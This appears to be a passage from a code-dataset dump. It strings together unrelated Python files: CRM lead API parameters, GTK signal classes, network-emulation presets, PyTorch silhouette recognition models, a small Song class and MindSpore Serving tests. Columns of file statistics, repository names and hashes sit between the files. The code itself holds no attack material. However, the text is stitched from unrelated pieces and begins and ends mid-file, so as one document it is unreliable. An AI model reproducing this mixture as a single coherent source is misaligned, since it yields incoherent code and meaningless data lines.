"company", openapi.IN_HEADER, required=True, type=openapi.TYPE_STRING
)
lead_list_get_params = [
company_params_in_header,
openapi.Parameter(
"title", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"source", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"assigned_to", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"status", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"tags", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
]
lead_detail_get_params = [
company_params_in_header,
openapi.Parameter(
"lead_attachment", openapi.IN_QUERY, type=openapi.TYPE_FILE,
),
openapi.Parameter(
"comment", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
]
lead_delete_params = [
company_params_in_header,
]
lead_create_post_params = [
company_params_in_header,
openapi.Parameter(
"title", openapi.IN_QUERY, required=True, type=openapi.TYPE_STRING
),
openapi.Parameter(
"first_name", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"last_name", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"account_name", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"phone", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"email", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"lead_attachment", openapi.IN_QUERY, type=openapi.TYPE_FILE,
),
openapi.Parameter(
"website", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"description", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"teams", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"assigned_to", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"status", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"source", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"address_line", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"street", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"city", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"state", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"postcode", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"country", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
openapi.Parameter(
"tags", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
]
lead_upload_post_params = [
company_params_in_header,
openapi.Parameter(
"leads_file", openapi.IN_QUERY, type=openapi.TYPE_FILE,
),
]
lead_comment_edit_params = [
company_params_in_header,
openapi.Parameter(
"comment", openapi.IN_QUERY, type=openapi.TYPE_STRING
),
]
| 27.470085
| 74
| 0.672993
| 369
| 3,214
| 5.569106
| 0.135501
| 0.233577
| 0.218978
| 0.245255
| 0.906569
| 0.891484
| 0.833577
| 0.80438
| 0.761557
| 0.545985
| 0
| 0
| 0.214686
| 3,214
| 116
| 75
| 27.706897
| 0.814184
| 0
| 0
| 0.697248
| 0
| 0
| 0.071873
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009174
| 0
| 0.009174
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2cadb51165109f752686ebf5d262e8c249fe2c27
| 1,825
|
py
|
Python
|
gtk_modules/signals.py
|
henrikmidtiby/gtk_modules
|
00e321b6b50ce2b9b31e08065b893752f1b2247c
|
[
"BSD-3-Clause"
] | null | null | null |
gtk_modules/signals.py
|
henrikmidtiby/gtk_modules
|
00e321b6b50ce2b9b31e08065b893752f1b2247c
|
[
"BSD-3-Clause"
] | null | null | null |
gtk_modules/signals.py
|
henrikmidtiby/gtk_modules
|
00e321b6b50ce2b9b31e08065b893752f1b2247c
|
[
"BSD-3-Clause"
] | null | null | null |
from gi.repository import GObject
class DrawSignals(GObject.GObject):
__gsignals__ = {'video_draw': (GObject.SIGNAL_RUN_LAST, None, (GObject.TYPE_PYOBJECT, GObject.TYPE_PYOBJECT, GObject.TYPE_PYOBJECT, GObject.TYPE_PYOBJECT)),
'image_draw': (GObject.SIGNAL_RUN_LAST, None, (str,)),
'point_draw': (GObject.SIGNAL_RUN_LAST, None, (GObject.TYPE_PYOBJECT,)),
'line_draw': (GObject.SIGNAL_RUN_LAST, None, (GObject.TYPE_PYOBJECT,)),
'line_draw_live': (GObject.SIGNAL_RUN_LAST, None, (float, float, float, float, float, float, float)),
'box_draw': (GObject.SIGNAL_RUN_LAST, None, (GObject.TYPE_PYOBJECT,)),
'box_draw_live': (GObject.SIGNAL_RUN_LAST, None, (float, float, float, float, float, float, float))}
def __init__(self):
super().__init__()
class MouseSignals(GObject.GObject):
__gsignals__ = {'left_mouse_press': (GObject.SIGNAL_RUN_LAST, None, (float, float, float, float)),
'left_mouse_release': (GObject.SIGNAL_RUN_LAST, None, (float, float)),
'left_mouse_move': (GObject.SIGNAL_RUN_LAST, None, (float, float)),
'right_mouse_press': (GObject.SIGNAL_RUN_LAST, None, (float, float, float, float)),
'right_mouse_release': (GObject.SIGNAL_RUN_LAST, None, (float, float)),
'right_mouse_move': (GObject.SIGNAL_RUN_LAST, None, (float, float)),
'middle_mouse_press': (GObject.SIGNAL_RUN_LAST, None, (float, float, float, float)),
'middle_mouse_release': (GObject.SIGNAL_RUN_LAST, None, (float, float)),
'middle_mouse_move': (GObject.SIGNAL_RUN_LAST, None, (float, float))}
def __init__(self):
super().__init__()
| 60.833333
| 160
| 0.629589
| 208
| 1,825
| 5.091346
| 0.168269
| 0.254958
| 0.241737
| 0.302172
| 0.855524
| 0.855524
| 0.829084
| 0.791313
| 0.791313
| 0.375826
| 0
| 0
| 0.235616
| 1,825
| 29
| 161
| 62.931034
| 0.75914
| 0
| 0
| 0.173913
| 0
| 0
| 0.126027
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.043478
| 0
| 0.304348
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2cc7eb2a5abe5414746c476f88721bd596bda843
| 165
|
py
|
Python
|
dazu/typing/__init__.py
|
ralphg6/david
|
064a7fd91961bdf372868e7b0a106102e9fc058b
|
[
"Apache-2.0"
] | 2
|
2020-01-07T01:15:49.000Z
|
2020-02-21T00:48:49.000Z
|
dazu/typing/__init__.py
|
Dazu-io/dazu
|
064a7fd91961bdf372868e7b0a106102e9fc058b
|
[
"Apache-2.0"
] | 41
|
2020-01-20T22:30:08.000Z
|
2020-02-21T19:46:52.000Z
|
dazu/typing/__init__.py
|
Dazu-io/dazu
|
064a7fd91961bdf372868e7b0a106102e9fc058b
|
[
"Apache-2.0"
] | 3
|
2019-03-15T17:56:04.000Z
|
2020-01-17T20:29:37.000Z
|
from dazu.typing.message import Message
from dazu.typing.model import Model
from dazu.typing.module import Module
from dazu.typing.training_data import TrainingData
| 33
| 50
| 0.854545
| 25
| 165
| 5.6
| 0.4
| 0.228571
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09697
| 165
| 4
| 51
| 41.25
| 0.939597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
39521d38d119ed7170f019b01c7d9db1f11ce54c
| 6,040
|
py
|
Python
|
mnemu/mnemu_presets.py
|
Corefracture/mnemu
|
dcbb0645966d0aea710f1755ba2dab88cd33e647
|
[
"MIT"
] | 4
|
2018-10-10T08:10:49.000Z
|
2020-08-05T22:09:15.000Z
|
mnemu/mnemu_presets.py
|
Corefracture/mnemu
|
dcbb0645966d0aea710f1755ba2dab88cd33e647
|
[
"MIT"
] | 1
|
2018-09-11T16:08:13.000Z
|
2018-09-11T16:09:11.000Z
|
mnemu/mnemu_presets.py
|
Corefracture/mnemu
|
dcbb0645966d0aea710f1755ba2dab88cd33e647
|
[
"MIT"
] | null | null | null |
# Copyright (C) 2018 Corefracture, Chris Coleman.
# www.corefracture.com - @corefracture
#
# Licensed under the MIT License, https://opensource.org/licenses/MIT
# See LICENSE.md for more details
from mnemu import netem_defs as NetEm
class MNemuPresets:
def __init__(self):
self._preset_download_names = {}
self._preset_download_data = {}
self._preset_upload_names = {}
self._preset_upload_data = {}
self._add_hardcoded_presets(self._preset_download_names, self._preset_download_data)
self._add_hardcoded_upload_presets(self._preset_upload_names, self._preset_upload_data)
def get_preset_names(self, upload=False):
if upload is False:
return self._preset_download_names
else:
return self._preset_upload_names
def get_preset(self, preset_id, upload=False):
data = self._preset_download_data if upload is False else self._preset_upload_data
if preset_id in data:
return data[preset_id]
else:
return None
def _add_hardcoded_presets(self, names, data):
# Mobile Terrible
id = "Full"
display_name = "Regular Network"
setting_data = NetEm.NetemSettings()
setting_data.set_bandwidth(100000)
names[id] = display_name
data[id] = setting_data
# Mobile Terrible
id = "MobileTerrible"
display_name = "Terrible Mobile"
setting_data = NetEm.NetemSettings()
setting_data.set_bandwidth(640)
setting_data.netem_setting(NetEm.NetemType.LATENCY, "175")
setting_data.netem_setting(NetEm.NetemType.LOSS, "1.50")
names[id] = display_name
data[id] = setting_data
# 2G
id = "2G"
display_name = "Mobile 2G"
setting_data = NetEm.NetemSettings()
setting_data.set_bandwidth(256)
setting_data.netem_setting(NetEm.NetemType.LATENCY, "75")
setting_data.netem_setting(NetEm.NetemType.LOSS, "0.50")
names[id] = display_name
data[id] = setting_data
#3G
id = "3G"
display_name = "Mobile 3G"
setting_data = NetEm.NetemSettings()
setting_data.set_bandwidth(1500)
setting_data.netem_setting(NetEm.NetemType.LATENCY, "75")
setting_data.netem_setting(NetEm.NetemType.LOSS, "0.15")
names[id] = display_name
data[id] = setting_data
#3G Low Signal
id = "3GLow"
display_name = "Mobile 3G - Low Signal"
setting_data = NetEm.NetemSettings()
setting_data.set_bandwidth(700)
setting_data.netem_setting(NetEm.NetemType.LATENCY, "100")
setting_data.netem_setting(NetEm.NetemType.LOSS, "0.50")
names[id] = display_name
data[id] = setting_data
# 3G High latency
id = "3G"
display_name = "Mobile 3G - High Latency"
setting_data = NetEm.NetemSettings()
setting_data.set_bandwidth(1500)
setting_data.netem_setting(NetEm.NetemType.LATENCY, "150")
setting_data.netem_setting(NetEm.NetemType.LOSS, "0.25")
names[id] = display_name
data[id] = setting_data
# 4G Low End
id = "4G"
display_name = "Mobile 4G - Low End"
setting_data = NetEm.NetemSettings()
setting_data.set_bandwidth(35000)
setting_data.netem_setting(NetEm.NetemType.LATENCY, "10")
setting_data.netem_setting(NetEm.NetemType.LOSS, "0.01")
names[id] = display_name
data[id] = setting_data
def _add_hardcoded_upload_presets(self, names, data):
# Mobile Terrible
id = "Full"
display_name = "Regular Network"
setting_data = NetEm.NetemSettings()
setting_data.set_bandwidth(100000)
names[id] = display_name
data[id] = setting_data
# Mobile Terrible
id = "MobileTerrible"
display_name = "Terrible Mobile"
setting_data = NetEm.NetemSettings()
setting_data.set_bandwidth(256)
setting_data.netem_setting(NetEm.NetemType.LATENCY, "200")
setting_data.netem_setting(NetEm.NetemType.LOSS, "1.50")
names[id] = display_name
data[id] = setting_data
# 2G
id = "2G"
display_name = "Mobile 2G"
setting_data = NetEm.NetemSettings()
setting_data.set_bandwidth(75)
setting_data.netem_setting(NetEm.NetemType.LATENCY, "75")
setting_data.netem_setting(NetEm.NetemType.LOSS, "0.25")
names[id] = display_name
data[id] = setting_data
# 3G
id = "3G"
display_name = "Mobile 3G"
setting_data = NetEm.NetemSettings()
setting_data.set_bandwidth(768)
setting_data.netem_setting(NetEm.NetemType.LATENCY, "50")
setting_data.netem_setting(NetEm.NetemType.LOSS, "0.15")
names[id] = display_name
data[id] = setting_data
# 3G Low Signal
id = "3GLow"
display_name = "Mobile 3G - Low Signal"
setting_data = NetEm.NetemSettings()
setting_data.set_bandwidth(650)
setting_data.netem_setting(NetEm.NetemType.LATENCY, "100")
setting_data.netem_setting(NetEm.NetemType.LOSS, "0.75")
names[id] = display_name
data[id] = setting_data
# 3G High latency
id = "3G"
display_name = "Mobile 3G - High Latency"
setting_data = NetEm.NetemSettings()
setting_data.set_bandwidth(768)
setting_data.netem_setting(NetEm.NetemType.LATENCY, "150")
setting_data.netem_setting(NetEm.NetemType.LOSS, "0.50")
names[id] = display_name
data[id] = setting_data
# 4G Low End
id = "4G"
display_name = "Mobile 4G - Low End"
setting_data = NetEm.NetemSettings()
setting_data.set_bandwidth(25000)
setting_data.netem_setting(NetEm.NetemType.LATENCY, "10")
setting_data.netem_setting(NetEm.NetemType.LOSS, "0.01")
names[id] = display_name
data[id] = setting_data
| 35.321637
| 95
| 0.641225
| 718
| 6,040
| 5.125348
| 0.130919
| 0.197283
| 0.165217
| 0.15
| 0.855163
| 0.843478
| 0.843478
| 0.830978
| 0.809783
| 0.783152
| 0
| 0.034397
| 0.263576
| 6,040
| 170
| 96
| 35.529412
| 0.792941
| 0.056291
| 0
| 0.769231
| 0
| 0
| 0.064437
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.007692
| 0
| 0.084615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
46c521bb66a4d7c4687f3162ec2f8498124dd995
| 9,552
|
py
|
Python
|
models/model.py
|
zihaomu/HID_2020_baseline
|
c2c3705707695a969d24aa52c225aa3f85c7a4f3
|
[
"Apache-2.0"
] | 34
|
2020-08-26T14:53:13.000Z
|
2021-09-26T12:41:55.000Z
|
models/model.py
|
zihaomu/HID_2020_baseline
|
c2c3705707695a969d24aa52c225aa3f85c7a4f3
|
[
"Apache-2.0"
] | 1
|
2020-10-10T14:29:25.000Z
|
2020-10-10T19:28:03.000Z
|
models/model.py
|
zihaomu/HID_2020_baseline
|
c2c3705707695a969d24aa52c225aa3f85c7a4f3
|
[
"Apache-2.0"
] | 7
|
2020-09-06T06:49:45.000Z
|
2022-03-11T11:13:39.000Z
|
import torch
import torch.nn as nn
def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=dilation, groups=groups, bias=False, dilation=dilation)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class YouOwnModel(nn.Module):
# set you own model structure here.
def __init__(self, feature_dimension = 512, block = Bottleneck, num_classes=500):
pass
def forward(self, silho):
pass
class SilhouetteDeep(nn.Module):
def __init__(self, feature_dimension = 512 ,block = Bottleneck, num_classes=86):
print("num_classes:", num_classes)
self.inplanes = 64
super(SilhouetteDeep, self).__init__()
self.conv1 = nn.Sequential(conv3x3(1,64),
nn.BatchNorm2d(64),
conv3x3(64, 64),
nn.BatchNorm2d(64),
nn.MaxPool2d(2,2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2)
)
self.layer1 = BasicBlock(64, 64)
self.conv2 = nn.Sequential(conv3x3(64,128),
nn.MaxPool2d(2, 2))
self.layer2 = nn.Sequential(BasicBlock(128, 128),
BasicBlock(128, 128))
self.conv3 = nn.Sequential(conv3x3(128,256),
nn.MaxPool2d(2, 2))
self.layer3 = nn.Sequential(Bottleneck(256, 64),
Bottleneck(256, 64),
Bottleneck(256, 64))
self.conv4 = nn.Sequential(conv3x3(256,512),
nn.MaxPool2d(2, 2))
self.layer4 = nn.Sequential(Bottleneck(512, 128),
Bottleneck(512, 128),
Bottleneck(512, 128))
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(512,feature_dimension)
self.out = nn.Linear(feature_dimension, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, silho):
n = silho.size(1)
print("n : =", n)
out = []
for i in range(n):
input = silho[:,i,:,:].unsqueeze(1)
print("input size",input.size())
x = self.conv1(input)
x = self.layer1(x)
x = self.conv2(x)
x = self.layer2(x)
x = self.conv3(x)
x = self.layer3(x)
x = self.conv4(x)
x = self.layer4(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
temp = x.unsqueeze(1)
if i !=0:
out = torch.cat((out, temp), 1)
else:
out = temp
fc = torch.mean(out, 1)
out = self.out(fc)
return fc, out
class SilhouetteNormal(nn.Module):
def __init__(self, feature_dimension = 512, block = Bottleneck, num_classes=86):
print("num_classes:", num_classes)
self.inplanes = 64
super(SilhouetteNormal, self).__init__()
self.conv1 = nn.Sequential(conv3x3(1,64),
nn.BatchNorm2d(64),
conv3x3(64, 64),
nn.BatchNorm2d(64),
nn.MaxPool2d(2,2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2)
)
self.layer1 = BasicBlock(64, 64)
self.conv2 = nn.Sequential(conv3x3(64,128),
nn.MaxPool2d(2, 2))
self.layer2 = nn.Sequential(BasicBlock(128, 128))
self.conv3 = nn.Sequential(conv3x3(128,256),
nn.MaxPool2d(2, 2))
self.layer3 = nn.Sequential(Bottleneck(256, 64))
self.conv4 = nn.Sequential(conv3x3(256,512),
nn.MaxPool2d(2, 2))
self.layer4 = nn.Sequential(Bottleneck(512, 128))
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(512,feature_dimension)
self.out = nn.Linear(feature_dimension, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, silho):
n = silho.size(1) #batch
out = []
for i in range(n):
input = silho[:,i,:,:].unsqueeze(1)
x = self.conv1(input)
x = self.layer1(x)
x = self.conv2(x)
x = self.layer2(x)
x = self.conv3(x)
x = self.layer3(x)
x = self.conv4(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
temp = x.unsqueeze(1)
if i !=0:
out = torch.cat((out, temp), 1)
else:
out = temp
fc = torch.mean(out, 1)
out = self.out(fc)
return fc, out
if __name__=="__main__":
model = SilhouetteNormal()
print(model)
| 34.483755
| 91
| 0.505025
| 1,052
| 9,552
| 4.499049
| 0.115019
| 0.022185
| 0.019015
| 0.021973
| 0.860765
| 0.85675
| 0.807099
| 0.774773
| 0.774773
| 0.757448
| 0
| 0.057138
| 0.382538
| 9,552
| 277
| 92
| 34.483755
| 0.745337
| 0.008794
| 0
| 0.776744
| 0
| 0
| 0.007516
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065116
| false
| 0.009302
| 0.009302
| 0
| 0.144186
| 0.023256
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
46d1f0370f1391b529beed0b77d550d4063ad7a1
| 212
|
py
|
Python
|
defining_classes_exercise/spoopify_08/project/song.py
|
B3WD/SU-python-oop
|
1df32e57cb095b2e6cdab1211c19ba340c434874
|
[
"MIT"
] | null | null | null |
defining_classes_exercise/spoopify_08/project/song.py
|
B3WD/SU-python-oop
|
1df32e57cb095b2e6cdab1211c19ba340c434874
|
[
"MIT"
] | null | null | null |
defining_classes_exercise/spoopify_08/project/song.py
|
B3WD/SU-python-oop
|
1df32e57cb095b2e6cdab1211c19ba340c434874
|
[
"MIT"
] | null | null | null |
class Song:
def __init__(self, name, lenght, single):
self.name = name
self.lenght = lenght
self.single = single
def get_info(self):
return f"{self.name} - {self.lenght}"
| 23.555556
| 45
| 0.584906
| 27
| 212
| 4.407407
| 0.444444
| 0.201681
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.29717
| 212
| 9
| 46
| 23.555556
| 0.798658
| 0
| 0
| 0
| 0
| 0
| 0.126761
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.142857
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
200965efe6fb9e7612929b73f7436f36fa39354c
| 72
|
py
|
Python
|
portality/bll/__init__.py
|
glauberm/doaj
|
dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7
|
[
"Apache-2.0"
] | 47
|
2015-04-24T13:13:39.000Z
|
2022-03-06T03:22:42.000Z
|
portality/bll/__init__.py
|
glauberm/doaj
|
dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7
|
[
"Apache-2.0"
] | 1,215
|
2015-01-02T14:29:38.000Z
|
2022-03-28T14:19:13.000Z
|
portality/bll/__init__.py
|
glauberm/doaj
|
dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7
|
[
"Apache-2.0"
] | 14
|
2015-11-27T13:01:23.000Z
|
2021-05-21T07:57:23.000Z
|
from portality.bll.doaj import DOAJ
from portality.bll import exceptions
| 36
| 36
| 0.861111
| 11
| 72
| 5.636364
| 0.545455
| 0.419355
| 0.516129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097222
| 72
| 2
| 36
| 36
| 0.953846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
647650d417e61aa879830e2f4b45c46a81669a26
| 49,684
|
py
|
Python
|
tests/ut/python/tests/test_stage_function.py
|
mindspore-ai/serving
|
e32d989ce629b4bdbbf3f16fefb02b28dce2dc4c
|
[
"Apache-2.0"
] | 157
|
2020-12-10T09:42:48.000Z
|
2021-12-02T09:27:48.000Z
|
tests/ut/python/tests/test_stage_function.py
|
mindspore-ai/serving
|
e32d989ce629b4bdbbf3f16fefb02b28dce2dc4c
|
[
"Apache-2.0"
] | 1
|
2021-12-08T11:39:59.000Z
|
2022-01-17T09:09:54.000Z
|
tests/ut/python/tests/test_stage_function.py
|
mindspore-ai/serving
|
e32d989ce629b4bdbbf3f16fefb02b28dce2dc4c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
from common import serving_test, create_client
from common import start_serving_server
def is_float_equal(left, right):
return (np.abs(left - right) < 0.00001).all()
@serving_test
def test_stage_function_one_function_stage_float_success():
"""
Feature: test servable_config.py stage
Description: Test stage with two inputs, one output
Expectation: Serving server work ok.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=True)
def test_concat(x1, x2):
return x1 + x2
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(test_concat, x1, x2, outputs_count=1)
return y
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
ys = []
x1s = []
x2s = []
x1s.append(np.array([[101.1, 205.2], [41.3, 62.4]], np.float32))
x2s.append(np.array([[3.5, 5.6], [7.7, 9.8]], np.float32))
x1s.append(np.array([[41.3, 32.2], [4.1, 3.9]], np.float32))
x2s.append(np.array([[1.4, 4.5], [9.6, 19.7]], np.float32))
x1s.append(np.array([[11.1, 21.2], [41.9, 61.8]], np.float32))
x2s.append(np.array([[31.5, 51.7], [71.4, 91.3]], np.float32))
for i in range(3):
instances.append({"x1": x1s[i], "x2": x2s[i]})
y = x1s[i] + x2s[i]
ys.append(y)
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert (result[0]["y"] == ys[0]).all()
assert (result[1]["y"] == ys[1]).all()
assert (result[2]["y"] == ys[2]).all()
@serving_test
def test_stage_function_one_function_stage_two_output_success():
"""
Feature: test servable_config.py stage
Description: Test stage with one input, two outputs
Expectation: Serving server work ok.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=True)
def test_concat(x1):
return x1 + 1, x1-1
@register.register_method(output_names=["y1", "y2"])
def predict(x1):
y1, y2 = register.add_stage(test_concat, x1, outputs_count=2)
return y1, y2
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
y1s = []
y2s = []
x1s = []
x1s.append(np.array([[101.1, 205.2], [41.3, 62.4]], np.float32))
x1s.append(np.array([[41.3, 32.2], [4.1, 3.9]], np.float32))
x1s.append(np.array([[11.1, 21.2], [41.9, 61.8]], np.float32))
for i in range(3):
instances.append({"x1": x1s[i]})
y1s.append(x1s[i] + 1)
y2s.append(x1s[i] - 1)
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert (result[0]["y1"] == y1s[0]).all()
assert (result[1]["y1"] == y1s[1]).all()
assert (result[2]["y1"] == y1s[2]).all()
